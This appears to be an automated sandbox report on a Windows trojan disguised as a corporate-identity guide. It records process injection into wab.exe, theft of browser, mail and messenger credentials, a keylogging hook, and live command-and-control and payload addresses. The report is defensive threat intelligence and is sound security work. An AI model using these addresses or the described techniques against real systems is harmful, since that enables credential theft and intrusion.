              Source: C:\Users\user\Desktop\DHRI_kurumsal kimlik rehberi-2023.exe API call chain: ExitProcess graph end node graph_4-4328
              Source: C:\Program Files (x86)\Windows Mail\wab.exe API call chain: ExitProcess graph end node graph_11-33898
              Source: wab.exe, wab.exe, 00000007.00000002.37745505722.0000000006B53000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000007.00000003.36576605972.0000000006B53000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
              Source: wab.exe, 00000007.00000003.36577115530.0000000006B02000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000007.00000002.37745429732.0000000006B03000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWa
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 7_2_374D2639 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,7_2_374D2639
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 7_2_374D724E GetProcessHeap,7_2_374D724E
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Process token adjusted: Debug
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 7_2_374D4AB4 mov eax, dword ptr fs:[00000030h]7_2_374D4AB4
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 7_2_374D2B1C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,7_2_374D2B1C
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 7_2_374D60E2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,7_2_374D60E2

              HIPS / PFW / Operating System Protection Evasion

              Source: C:\Users\user\Desktop\DHRI_kurumsal kimlik rehberi-2023.exe; Section loaded: C:\Windows\SysWOW64\mshtml.dll target: C:\Program Files (x86)\Windows Mail\wab.exe protection: read write
              Source: C:\Program Files (x86)\Windows Mail\wab.exe; Section loaded: unknown target: C:\Program Files (x86)\Windows Mail\wab.exe protection: execute and read and write
              Source: C:\Program Files (x86)\Windows Mail\wab.exe; Section loaded: unknown target: C:\Program Files (x86)\Windows Mail\wab.exe protection: execute and read and write
              Source: C:\Program Files (x86)\Windows Mail\wab.exe; Section loaded: unknown target: C:\Program Files (x86)\Windows Mail\wab.exe protection: execute and read and write
              Source: C:\Users\user\Desktop\DHRI_kurumsal kimlik rehberi-2023.exe; Memory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 2E00000
              Source: C:\Users\user\Desktop\DHRI_kurumsal kimlik rehberi-2023.exe; Memory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 2CA9008
              Source: C:\Users\user\Desktop\DHRI_kurumsal kimlik rehberi-2023.exe; Process created: C:\Program Files (x86)\Windows Mail\wab.exe C:\Users\user\Desktop\DHRI_kurumsal kimlik rehberi-2023.exe
              Source: C:\Program Files (x86)\Windows Mail\wab.exe; Process created: C:\Program Files (x86)\Windows Mail\wab.exe C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\wheazxfmlszmjbyggwujugr
              Source: C:\Program Files (x86)\Windows Mail\wab.exe; Process created: C:\Program Files (x86)\Windows Mail\wab.exe C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\wheazxfmlszmjbyggwujugr
              Source: C:\Program Files (x86)\Windows Mail\wab.exe; Process created: C:\Program Files (x86)\Windows Mail\wab.exe C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\gcjtaqqgzarzmhukyhhkxsdkut
              Source: C:\Program Files (x86)\Windows Mail\wab.exe; Process created: C:\Program Files (x86)\Windows Mail\wab.exe C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\repdaaihvijewviohscmifybdhowx
              Source: wab.exe, 00000007.00000002.37745505722.0000000006B3C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000007.00000003.36576605972.0000000006B3C000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: Program ManagerE
              Source: wab.exe, wab.exe, 00000007.00000002.37745505722.0000000006B3C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000007.00000003.36576605972.0000000006B3C000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: Program Manager
              Source: wab.exe, 00000007.00000002.37745505722.0000000006B3C000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: Program Managernt.
              Source: wab.exe; Binary or memory string: [2023/10/30 14:17:56 Program Manager]
              Source: wab.exe, 00000007.00000002.37745505722.0000000006B3C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000007.00000003.36576605972.0000000006B3C000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: Program Managerr|
              Source: wab.exe, 00000007.00000002.37745505722.0000000006B3C000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: Program Managernt.ge=
              Source: wab.exe, 00000007.00000002.37745505722.0000000006B3C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000007.00000003.36576605972.0000000006B3C000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: Program Managerj
              Source: wab.exe, 00000007.00000002.37745505722.0000000006B53000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000007.00000002.37745505722.0000000006B3C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000007.00000003.36576605972.0000000006B53000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: [2023/10/30 14:17:56 Program Manager]
              Source: wab.exe, 00000007.00000002.37745505722.0000000006B3C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000007.00000003.36576605972.0000000006B3C000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: Program Managerknown.
              Source: wab.exe, 00000007.00000002.37745505722.0000000006B3C000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: Program ManagerV
              Source: wab.exe, 00000007.00000002.37745505722.0000000006B3C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000007.00000003.36576605972.0000000006B3C000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: [%04i/%02i/%02i %02i:%02i:%02i Program Manager]
              Source: wab.exe, 00000007.00000003.35528543636.0000000006B70000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000007.00000003.35528657135.0000000006B74000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000007.00000002.37745505722.0000000006B75000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: [2023/10/30 14:17:51 Program Manager]
              Source: wab.exe, 00000007.00000002.37745505722.0000000006B3C000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: Program Manager@
              Source: wab.exe, 00000007.00000002.37745505722.0000000006B53000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000007.00000003.36576605972.0000000006B36000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000007.00000003.36576605972.0000000006B53000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: |Program Manager|
              Source: wab.exe, 00000007.00000003.36576605972.0000000006B3C000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: Program Manager943408
              Source: wab.exe, 00000007.00000002.37745505722.0000000006B3C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000007.00000003.36576605972.0000000006B3C000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: Program Manager158 P
              Source: C:\Program Files (x86)\Windows Mail\wab.exe; Queries volume information: C:\ VolumeInformation
              Source: C:\Program Files (x86)\Windows Mail\wab.exe; Code function: 7_2_374D2933 cpuid
              Source: C:\Program Files (x86)\Windows Mail\wab.exe; Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
              Source: C:\Program Files (x86)\Windows Mail\wab.exe; Code function: 7_2_374D2264 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter
              Source: C:\Users\user\Desktop\DHRI_kurumsal kimlik rehberi-2023.exe; Code function: 4_2_0040338F EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess
              Source: C:\Program Files (x86)\Windows Mail\wab.exe; Code function: 11_2_00408043 memset,memset,memset,memset,GetComputerNameA,GetUserNameA,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,strlen,strlen,memcpy

              Stealing of Sensitive Information

              Source: Yara match; File source: 00000007.00000002.37745505722.0000000006B3C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match; File source: 00000007.00000003.36576605972.0000000006B3C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match; File source: Process Memory Space: wab.exe PID: 7060, type: MEMORYSTR
              Source: Yara match; File source: C:\Users\user\AppData\Roaming\paqlgkfs.dat, type: DROPPED
              Source: C:\Program Files (x86)\Windows Mail\wab.exe; Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
              Source: C:\Program Files (x86)\Windows Mail\wab.exe; Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
              Source: C:\Program Files (x86)\Windows Mail\wab.exe; Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
              Source: C:\Program Files (x86)\Windows Mail\wab.exe; Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live Mail
              Source: C:\Program Files (x86)\Windows Mail\wab.exe; Code function: ESMTPPassword 11_2_004033E2
              Source: C:\Program Files (x86)\Windows Mail\wab.exe; Code function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, PopPassword 11_2_00402DA5
              Source: C:\Program Files (x86)\Windows Mail\wab.exe; Code function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, SMTPPassword 11_2_00402DA5
              Source: Yara match; File source: Process Memory Space: wab.exe PID: 7060, type: MEMORYSTR
              Source: Yara match; File source: Process Memory Space: wab.exe PID: 2268, type: MEMORYSTR
              Source: C:\Program Files (x86)\Windows Mail\wab.exe; Key opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts
              Source: C:\Program Files (x86)\Windows Mail\wab.exe; Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Dynamic Salt
              Source: C:\Program Files (x86)\Windows Mail\wab.exe; Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Dynamic Salt
              Source: C:\Program Files (x86)\Windows Mail\wab.exe; Key opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts
              Source: C:\Program Files (x86)\Windows Mail\wab.exe; Key opened: HKEY_CURRENT_USER\Software\Paltalk
              Source: C:\Program Files (x86)\Windows Mail\wab.exe; File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\places.sqlite
              Source: C:\Program Files (x86)\Windows Mail\wab.exe; File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\key4.db
              Source: C:\Program Files (x86)\Windows Mail\wab.exe; File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
              Source: C:\Program Files (x86)\Windows Mail\wab.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
              Source: C:\Program Files (x86)\Windows Mail\wab.exe; File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
              Source: C:\Program Files (x86)\Windows Mail\wab.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data

              Remote Access Functionality

              Source: Yara match; File source: 00000007.00000002.37745505722.0000000006B3C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match; File source: 00000007.00000003.36576605972.0000000006B3C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match; File source: Process Memory Space: wab.exe PID: 7060, type: MEMORYSTR
              Source: Yara match; File source: C:\Users\user\AppData\Roaming\paqlgkfs.dat, type: DROPPED

              Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
              Valid Accounts | 11 Native API | 1 DLL Side-Loading | 1 DLL Side-Loading | 1 Deobfuscate/Decode Files or Information | 1 OS Credential Dumping | 1 System Time Discovery | Remote Services | 1 Archive Collected Data | Exfiltration Over Other Network Medium | 1 Ingress Tool Transfer | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | 1 System Shutdown/Reboot
              Default Accounts | 2 Command and Scripting Interpreter | 1 Registry Run Keys / Startup Folder | 1 Access Token Manipulation | 2 Obfuscated Files or Information | 11 Input Capture | 1 Account Discovery | Remote Desktop Protocol | 1 Data from Local System | Exfiltration Over Bluetooth | 1 Encrypted Channel | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
              Domain Accounts | At (Linux) | Logon Script (Windows) | 212 Process Injection | 1 DLL Side-Loading | 2 Credentials in Registry | 2 File and Directory Discovery | SMB/Windows Admin Shares | 1 Email Collection | Automated Exfiltration | 1 Non-Standard Port | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
              Local Accounts | At (Windows) | Logon Script (Mac) | 1 Registry Run Keys / Startup Folder | 1 Masquerading | 1 Credentials In Files | 28 System Information Discovery | Distributed Component Object Model | 11 Input Capture | Scheduled Transfer | 2 Non-Application Layer Protocol | SIM Card Swap | | Carrier Billing Fraud
              Cloud Accounts | Cron | Network Logon Script | Network Logon Script | 2 Virtualization/Sandbox Evasion | LSA Secrets | 131 Security Software Discovery | SSH | 11 Clipboard Data | Data Transfer Size Limits | 112 Application Layer Protocol | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings
              Replication Through Removable Media | Launchd | Rc.common | Rc.common | 1 Access Token Manipulation | Cached Domain Credentials | 2 Virtualization/Sandbox Evasion | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features
              External Remote Services | Scheduled Task | Startup Items | Startup Items | 212 Process Injection | DCSync | 4 Process Discovery | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact
              Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Indicator Removal from Tools | Proc Filesystem | 1 Application Window Discovery | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | | Generate Fraudulent Advertising Revenue
              Exploit Public-Facing Application | PowerShell | At (Linux) | At (Linux) | Masquerading | /etc/passwd and /etc/shadow | 1 System Owner/User Discovery | Software Deployment Tools | Data Staged | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | Web Protocols | Rogue Cellular Base Station | | Data Destruction

              Behavior Graph (ID: 1334254; Sample: DHRI_kurumsal kimlik rehber...; Startdate: 30/10/2023; Architecture: WINDOWS; Score: 100)

              Domains: ourt2949aslumes9.duckdns.org, gudanidevelopment.ge, geoplugin.net
              Signatures: Snort IDS alert for network traffic; Antivirus detection for URL or domain; Antivirus detection for dropped file; 9 other signatures

              Process: DHRI_kurumsal kimlik rehberi-2023.exe (started)
                Dropped file: C:\Users\user\AppData\Local\...\System.dll, PE32
                Signatures: Writes to foreign memory regions; Maps a DLL or memory area into another process
                Process: wab.exe (started)
                  DNS/IP: 94.156.6.253, 2402, 50094, 50095, NET1-ASBG, Bulgaria
                  DNS/IP: gudanidevelopment.ge, 217.147.225.69, 50093, 80, GRENA-ASTbilisiGeorgiaGE, Georgia
                  DNS/IP: geoplugin.net, 178.237.33.50, 50096, 80, ATOM86-ASATOM86NL, Netherlands
                  Dropped file: C:\Users\user\AppData\Local\...\Retarded.exe, PE32
                  Dropped file: C:\Users\user\AppData\Roaming\paqlgkfs.dat, data
                  Signatures: Maps a DLL or memory area into another process; Installs a global keyboard hook
                  Process: wab.exe (started)
                    Signatures: Tries to steal Instant Messenger accounts or passwords; Tries to harvest and steal browser information (history, passwords, etc)
                  Process: wab.exe (started)
                    Signatures: Tries to steal Mail credentials (via file / registry access)
                  Process: wab.exe (started)
                  Process: wab.exe (started)

              Source | Detection | Scanner | Label | Link
              DHRI_kurumsal kimlik rehberi-2023.exe | 100% | Avira | HEUR/AGEN.1338455 |
              DHRI_kurumsal kimlik rehberi-2023.exe | 78% | ReversingLabs | Win32.Trojan.GuLoader |

              Source | Detection | Scanner | Label | Link
              C:\Users\user\AppData\Local\Temp\Atriocoelomic\Retarded.exe | 100% | Avira | HEUR/AGEN.1338455 |
              C:\Users\user\AppData\Local\Temp\Atriocoelomic\Retarded.exe | 78% | ReversingLabs | Win32.Trojan.GuLoader |
              C:\Users\user\AppData\Local\Temp\nsq53F5.tmp\System.dll | 0% | ReversingLabs | |

              No Antivirus matches

              No Antivirus matches

              Source | Detection | Scanner | Label | Link
              http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com | 0% | Avira URL Cloud | safe |
              https://go.microsoft.co | 0% | Avira URL Cloud | safe |
              http://www.imvu.comr | 0% | Avira URL Cloud | safe |
              https://2542116.fls.doublecli | 0% | Avira URL Cloud | safe |
              https://aefd.nelreports.net/api/report?cat=bingaotak | 0% | Avira URL Cloud | safe |
              http://gudanidevelopment.ge/IogvoayYhe139.bin | 100% | Avira URL Cloud | malware |
              https://deff.nelreports.net/api/report?cat=msn | 0% | Avira URL Cloud | safe |
              http://gudanidevelopment.ge/IogvoayYhe139.binSkorFiltathirchimie.com/IogvoayYhe139.bin | 100% | Avira URL Cloud | malware |
              https://adservice.google.co. | 0% | Avira URL Cloud | safe |
              https://odc.offi | 0% | Avira URL Cloud | safe |
              https://odc.officeap | 0% | Avira URL Cloud | safe |
              https://adservice.google.co.uk/ddm/fls/i/src=2542116;type=chrom322;cat=chrom01g;ord=3739368433491;gt | 0% | Avira URL Cloud | safe |
              https://eb2.3lif | 0% | Avira URL Cloud | safe |
              https://get.a | 0% | Avira URL Cloud | safe |
              https://contextual.med | 0% | Avira URL Cloud | safe |
              http://geoplugin.net/json.gp_f | 0% | Avira URL Cloud | safe |
              http://www.imvu.comata | 0% | Avira URL Cloud | safe |
              https://2542116.fls.double | 0% | Avira URL Cloud | safe |
              https://get3.adobe | 0% | Avira URL Cloud | safe |
              https://capturemedia-assets.com/ig-bank/ad-engagement/startAnimation/main/index.html | 0% | Avira URL Cloud | safe |
              http://geoplugin.net/json.gp | 0% | Avira URL Cloud | safe |
              http://geoplugin.net/ | 0% | Avira URL Cloud | safe |
              https://contextual.medi | 0% | Avira URL Cloud | safe |
              https://get3.adobe.co | 0% | Avira URL Cloud | safe |
              http://www.ebuddy.com | 0% | Avira URL Cloud | safe |
              https://support.g | 0% | Avira URL Cloud | safe |
              https://www.adobe.cb | 0% | Avira URL Cloud | safe |
              https://tpc.g | 0% | Avira URL Cloud | safe |

              Name | IP | Active | Malicious | Antivirus Detection | Reputation
              gudanidevelopment.ge | 217.147.225.69 | true | true | | unknown
              geoplugin.net | 178.237.33.50 | true | false | | unknown
              ourt2949aslumes9.duckdns.org | unknown | unknown | true | | unknown

              Name | Malicious | Antivirus Detection | Reputation
              http://gudanidevelopment.ge/IogvoayYhe139.bin | true | Avira URL Cloud: malware | unknown
              http://geoplugin.net/json.gp | false | Avira URL Cloud: safe | unknown
                                                                    http://geoplugin.net/json.gp_fwab.exe, 00000007.00000002.37745505722.0000000006B3C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000007.00000003.36576605972.0000000006B3C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    unknown
                                                                    http://www.nirsoft.net/wab.exe, 0000000C.00000002.35549632170.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                                                                      high
                                                                      http://www.imvu.comatawab.exe, 0000000C.00000002.35550707145.00000000037DD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      unknown
                                                                      https://www.msn.com/spartan/en-gb/kernel/appcache/cache.appcache?locale=en-GB&market=GB&enableregulabhvBEC4.tmp.10.drfalse
                                                                        high
                                                                        https://www.msn.com/spartan/ientp?locale=en-GB&market=GB&enableregulatorypsm=0&enablecpsm=0&NTLogo=1wab.exe, 0000000A.00000003.35573574777.0000000004671000.00000004.00000020.00020000.00000000.sdmp, bhvBEC4.tmp.10.drfalse
                                                                          high
                                                                          https://2542116.fls.doubleclick.net/activityi;src=2542116;type=chrom322;cat=chrom01g;ord=37393684334wab.exe, 0000000A.00000003.35573574777.0000000004671000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.35575493602.000000000468A000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.35576455750.000000000468A000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.35575056619.0000000004689000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.35576603084.000000000468A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            high
                                                                            https://contextual.medwab.exe, 0000000A.00000003.35575331728.000000000467C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.35575295495.000000000467C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            unknown
                                                                            https://adservice.google.com/ddm/fls/i/src=2542116;type=chrom322;cat=chrom01g;ord=3739368433491;gtm=wab.exe, 0000000A.00000003.35573574777.0000000004671000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              high
                                                                              https://www.google.com/pagead/drt/uiwab.exe, 0000000A.00000003.35575331728.000000000467C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.35573574777.0000000004671000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.35575295495.000000000467C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                high
                                                                                https://2542116.fls.doubleclick.net/activiwab.exe, 0000000A.00000003.35575331728.000000000467C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.35575295495.000000000467C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  https://capturemedia-assets.com/ig-bank/ad-engagement/startAnimation/main/index.htmlwab.exe, 0000000A.00000003.35575331728.000000000467C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.35573574777.0000000004671000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.35575295495.000000000467C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  • Avira URL Cloud: safe
                                                                                  unknown
                                                                                  https://eb2.3lifwab.exe, 0000000A.00000003.35575331728.000000000467C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.35575295495.000000000467C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  • Avira URL Cloud: safe
                                                                                  low
                                                                                  https://get.awab.exe, 0000000A.00000003.35575331728.000000000467C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.35575295495.000000000467C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  • Avira URL Cloud: safe
                                                                                  unknown
                                                                                  http://www.imvu.comwab.exe, wab.exe, 0000000C.00000002.35549632170.0000000000400000.00000040.80000000.00040000.00000000.sdmp, wab.exe, 0000000C.00000002.35550707145.00000000037DD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    https://contextual.media.net/checkswab.exe, 0000000A.00000003.35575331728.000000000467C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.35575295495.000000000467C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      https://contextual.media.net/medianet.php?cid=8CU157172&crid=858412214&size=306x271&https=1wab.exe, 0000000A.00000003.35573574777.0000000004671000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        http://nsis.sf.net/NSIS_ErrorErrorDHRI_kurumsal kimlik rehberi-2023.exefalse
                                                                                          high
                                                                                          https://get3.adobewab.exe, 0000000A.00000003.35575331728.000000000467C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.35575295495.000000000467C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          • Avira URL Cloud: safe
                                                                                          unknown
                                                                                          https://www.msn.com/spartan/ientpwab.exe, 0000000A.00000003.35575331728.000000000467C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.35575295495.000000000467C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            high
                                                                                            http://www.imvu.com/8rwab.exe, 0000000C.00000002.35549985519.0000000002DAC000.00000004.00000010.00020000.00000000.sdmpfalse
                                                                                              high
                                                                                              https://acdn.adnxs.com/dmp/async_usersync.html?gdpr=1&gdpr_consent=CPM7kC1PM7kC1AcABBENBQCsAP_AAELAAwab.exe, 0000000A.00000003.35571324117.0000000004D96000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.35573483184.0000000004D96000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.35571517195.0000000004D96000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.35571582284.0000000004D96000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.35571702365.0000000004D96000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.35571387430.0000000004D96000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.35571824908.0000000004D96000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.35571642671.0000000004D96000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.35571761891.0000000004D96000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.35571888637.0000000004D96000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                high
                                                                                                https://2542116.fls.doubleclick.net/activityi;src=2542116;type=2542116;cat=chrom0;ord=8672137916610;wab.exe, 0000000A.00000003.35573574777.0000000004671000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  high
                                                                                                  https://www.msn.com/?ocid=iehpwab.exe, 0000000A.00000003.35569619278.0000000004671000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.35573574777.0000000004671000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    high
                                                                                                    http://geoplugin.net/wab.exe, 00000007.00000003.36577115530.0000000006B02000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000007.00000002.37745429732.0000000006B03000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    • Avira URL Cloud: safe
                                                                                                    unknown
                                                                                                    https://contextual.media.net/medianet.php?cid=8CU157172&crid=722878611&size=306x271&https=1wab.exe, 0000000A.00000003.35573574777.0000000004671000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      high
                                                                                                      https://ib.adnxs.com/async_usersync_filewab.exe, 0000000A.00000003.35573574777.0000000004671000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        high
                                                                                                        https://support.gwab.exe, 0000000A.00000002.35582571541.0000000004D90000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        • Avira URL Cloud: safe
                                                                                                        unknown
                                                                                                        https://www.google.com/accounts/serviceloginwab.exefalse
                                                                                                          high
                                                                                                          https://googleads.g.doubleclick.net/pagead/ads?gdpr=1&gdpr_consent=CPM7kC1PM7kC1AcABBENBQCsAP_AAELAAwab.exe, 0000000A.00000003.35571449811.0000000004D99000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            high
                                                                                                            https://contextual.media.net/checksync.phpwab.exe, 0000000A.00000003.35575331728.000000000467C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.35575295495.000000000467C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                              high
                                                                                                              https://www.adobe.cbwab.exe, 0000000A.00000002.35582571541.0000000004D90000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                              • Avira URL Cloud: safe
                                                                                                              unknown
                                                                                                              https://contextual.mediwab.exe, 0000000A.00000003.35575331728.000000000467C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.35575295495.000000000467C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                              • Avira URL Cloud: safe
                                                                                                              unknown
                                                                                                              https://get3.adobe.cowab.exe, 0000000A.00000003.35575331728.000000000467C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.35575295495.000000000467C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                              • Avira URL Cloud: safe
                                                                                                              unknown
                                                                                                              https://tpc.gwab.exe, 0000000A.00000003.35575331728.000000000467C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.35575295495.000000000467C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                              • Avira URL Cloud: safe
                                                                                                              unknown
                                                                                                              http://www.ebuddy.comwab.exe, wab.exe, 0000000C.00000002.35549632170.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
